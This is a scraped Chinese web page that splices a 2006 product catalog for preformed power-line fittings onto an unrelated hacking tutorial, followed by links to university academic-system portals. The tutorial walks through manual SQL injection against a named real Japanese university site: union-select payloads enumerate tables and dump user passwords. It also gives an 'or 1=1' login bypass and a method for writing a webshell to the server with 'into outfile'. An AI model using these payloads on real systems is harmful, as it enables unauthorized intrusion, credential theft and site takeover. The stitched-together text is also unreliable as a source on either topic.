【www.guakaob.com--电气工程师】
预绞式线路金具产品手册
(2006版)
深圳市怀博电气技术有限公司
Shenzhen Hope Eletric Technology CO.,LTD
目 录
一、预绞式导线耐张线夹 ...................................... 2 二、预绞式拉线耐张线夹 ...................................... 6 三、预绞式悬垂线夹 .......................................... 8 四、预绞式护线条 .......................................... 14 五、预绞式导线接续条 ....................................... 20 六、防振金具 .............................................. 29 七、产品试验报告 .......................................... 30【http://210.40.30.28;8080/jwweb】
预绞式导线耐张线夹
预绞式导线耐张线夹用于配电线路的裸导线或架空绝缘导线安装,产品可靠性及经济型优于目前线路上广泛使用的螺栓型、压缩型耐张线夹。
预绞式导线耐张线夹的结构简单,安装后预绞丝双腿形成的管状结构自然缠绕在导线上可产生极强的握紧力,新颖的结构和精密的设计,使导线耐张线夹拥有可靠的性能。线夹通常由镀锌钢丝材料制造,也可用铝包钢制造。【http://210.40.30.28;8080/jwweb】
4) 线夹的安装质量易于保证,用肉眼即可进行检验,不需专门训练。 5) 耐腐蚀性好;材质与导线完全一致,保证线夹具有较强的耐腐蚀性。
提示:
1) 由于线夹的特殊结构,产品只能一次性使用。 2) 选配产品或订货时必须提供导线的规格型号。
3) 不得在线夹上搭接,但在线夹前后的导线上进行搭接是允许的。
4) 线夹和导线的旋向应保持一致。标准的线夹是右旋,如需左旋产品须声明。 5) 不要用于架空地线。
钢芯铝绞线用预绞式导线耐张线夹选型表
备注: 1、DT/L 763-2001标准型号中N-耐张线夹,L-螺旋预绞式;“-”后为适用导线型号。
2、表中仅列出部分产品,其他规格请与怀博公司联系。
钢芯铝绞线用预绞式导线耐张线夹选型表(续表)
备注: 1. DT/L 763-2001标准型号中N-耐张线夹,L-螺旋预绞式;“-”后为适用导线型号。
2. 表中仅列出部分产品,其他规格请与怀博公司联系。
铝绞线用预绞式导线耐张线夹选型表
备注: 1. DT/L 763-2001标准型号中N-耐张线夹,L-螺旋预绞式;LJ-铝绞线导线;“-”后为适用导线型号。
2. 表中仅列出部分产品,其他规格请与怀博公司联系。
PHP手工注入
今天看了看php手工注射的教程(knife出品。。。。),于是找个站练手。 就这个把,日本福岛大学。
顺手加个',报错,存在注入。
Order by 47 返回正常,Order by 48返回错误,47个字段(真多呀。。。。。) 我们来在页面上显示出那些位置:
+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47
之后我们查看一下基本信息,一般要用到的几个函数:
version() 版本 database()当前数据库 user()当前用户
由此可知当前数据库版本:5.0.51a-community 数据库名称:kenkyu 数据库用户名:kenky846
看来不是root权限,我们要知道,mysql数据5.0以上的版本都带有一个
information_schema的虚拟库里面存放的是所有库的信息,所以我们用这个库来爆表名,列名。
首先我们来爆下字段
http:\\kenkyu.fukushima-u.ac.jp/detail.php?no=16+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,table_name,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47
+from+information_schema.tables+where+table_schema=0x6B656E6B7975+limit+0,1 0x6B656E6B7975 这个是数据库名的hex编码。
如图内容,爆出master表。
我们在语句后面添加一个limit0,1 意思是显示第一条数据。如果第一条数据不是管理员表,那么我们就增加一条数据limit1,1,以此类推。
但是这样就比较麻烦了,我们可以使用语句:
或者
如图,所有表就出来了:
然后我们来快速爆字段
0x66756B5F75736572 为fuk_user的hex编码(16进制)
爆出了,如图:
貌似不是管理员表呀。。。。。
不管了,就是个方法,大家会用就ok了,直接爆数据:
no=16+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,group_concat(no,0x3A,pw),20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47+from+fuk_user
如图:
之后找后台登录拿shell。
PHP【http://210.40.30.28;8080/jwweb】
山东大学的王博士最近可是搞md5搞的红透了,我们也来搞一搞吧,我们比他更爽,不用计算,哈哈。
md5我们是有办法绕过的,但是并不是哪里都可以,php中的md5函数就不能绕过,因为你输入的所有东西都在里面,根本跑不出。可以绕过的是sql语句中的md5。当然别的sql中的函数也是可以绕过的,道理相同哦。
看例子先:
//login.php
......
$query="select * from alphaauthor where UserName=md5($username) and Password= ".$Pw." ";
......
?>
我们直接在浏览器提交
http:/login.php?username=char(97,98)) or 1=1 %23
带入sql语句成为select * from alphaauthor where
UserName=md5(char(97,98)) or 1=1 #) and Password= ".$Pw."
记得md5里面放的是字符,因为后面有or 1=2,所以我们随便放了个
char(97,98). Ok,登陆成功了哦!看看,md5在我们面前也没有什么用处。
5. 核心技术,利用php+mysql注入漏洞直接写入webshell。。
直接利用注入得到webshell,这应该是大家都很想的吧,下面就教给你。 这里假设你已经知道了网站所在的物理路径,我这里假设网站路径为
c:/apache/htdocs/site。网站的mysql连接信息放在/lib/sql.inc.php里
1)适用于magic_quotes_gpc=Off
假设我们可以上传图片,或者txt,zip,等其它东西,我们把我们的木马改成 jpg后缀的,上传后路径为/upload/2004091201.jpg
2004091201.jpg中的内容为
好,我们开始
C:/apache/htdocs/site/upload/2004091201.jpg ),4,5,6,7,8,9,10,11%20into%20outfile C:/apache/htdocs/site/shell.php 因为适用了outfile,所以网页显示不正常,但是我们的任务是完成了。
我们赶快去看看
爽否?Webshell我们已经创建成功了。看到最前面的12了没?那就是我们select 1,2所输出的!
2)下面再讲一个适用于magic_quotes_gpc=On的时候保存webshell的方法哦,显然肯定也能用在于magic_quotes_gpc=Off的时候啦。
我们直接读他的配置文件,用技巧2介绍的方法
广州朗智玩具公司官网/retype/zoom/1b332ec7b52acfc788ebc9b9?pn=1&x=0&y=0&raww=888&rawh=629&o=jpg_6_0_______&type=pic&aimh=340&md5sum=2666b04ce53189acbd8be55d842895fa&sign=6fe6b2e4d6&zoom=&png=0-62828&jpg=0-55850" target="_blank">
下面中国招生考试网小编给各位考生整理:
贵州大学科技学院教务系统入口:http://210.40.30.28:8080/jwweb/
下面中国招生考试网小编给各位考生整理:
贵州民族大学教务管理系统入口:http://210.40.132.25/
本文来源:http://www.guakaob.com/jianzhugongchengkaoshi/526224.html
上一篇:车主对售后服务感谢信
下一篇:三会一课会议记录要求